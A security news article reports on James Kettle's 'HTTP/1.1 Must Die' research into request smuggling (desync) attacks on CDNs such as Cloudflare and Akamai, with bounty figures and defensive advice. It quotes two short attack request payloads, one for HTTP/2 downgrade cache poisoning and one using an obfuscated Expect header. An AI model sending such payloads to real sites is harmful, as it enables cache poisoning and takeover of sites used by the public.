Critical HTTP/1.1 Flaw Puts Millions of Websites at Risk of Takeover

Security researcher James Kettle from PortSwigger has released groundbreaking research demonstrating that HTTP/1.1 remains fundamentally insecure despite six years of attempted mitigations.

The comprehensive whitepaper titled “HTTP/1.1 Must Die: The Desync Endgame” reveals novel attack classes that exposed tens of millions of websites through critical vulnerabilities in major CDN infrastructures, including Akamai, Cloudflare, and Netlify.

Uncover Widespread Vulnerabilities

The research introduces an enhanced open-source toolkit, HTTP Request Smuggler v3.0, that systematically detects parser discrepancies using four major length interpretations: Content-Length (CL), Transfer-Encoding (TE), Implicit-zero (0), and HTTP/2’s built-in length (H2).

This methodology proved devastatingly effective, with researchers earning over $200,000 in bug bounties within just two weeks.

A particularly striking discovery involved an accidental compromise of 24 million websites through a Cloudflare infrastructure desync.

The attack exploited HTTP/2 downgrading vulnerabilities using a simple payload:

textGET /assets/icon.png HTTP/2
Host: <redacted>

GET /assets HTTP/1.1
Host: psres.net
X: y

This H2.0 desync attack poisoned Cloudflare’s cache, enabling persistent site takeover across millions of domains.

Novel 0.CL and Expect-Based Attack Vectors Emerge

The research unveils two groundbreaking attack categories that bypass existing defenses.

0.CL desync attacks, previously considered unexploitable due to upstream connection deadlocks, were made viable through “early-response gadgets.”

On Windows IIS servers, researchers leveraged reserved filenames like /con to trigger immediate responses without waiting for request bodies.

Even more significantly, Expect-based desync attacks were discovered affecting numerous high-profile targets.

A vulnerability in Akamai’s infrastructure using an obfuscated Expect header resulted in 74 separate bounty reports totaling $221,000:

textOPTIONS /anything HTTP/1.1
Host: auth.lastpass.com
Expect: 
 100-continue
Content-Length: 39

This attack enabled serving arbitrary content to users of major websites, demonstrating the CL.0 desync technique’s devastating potential.

The research emphasizes that HTTP/1.1’s fatal flaw lies in weak request boundaries, where multiple length specification methods create extreme ambiguity about request separation.

Unlike HTTP/1.1’s text-based protocol, HTTP/2’s binary format eliminates this ambiguity, making desync attacks virtually impossible.

Kettle argues that upstream HTTP/2 adoption is the only viable long-term solution, as six years of implementation patches have failed to address the protocol’s fundamental design flaw.

The research concludes with a call to action: organizations must transition to upstream HTTP/2 to eliminate this persistent threat that continues to expose millions of websites worldwide.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates

The post Critical HTTP/1.1 Flaw Puts Millions of Websites at Risk of Takeover appeared first on Cyber Security News.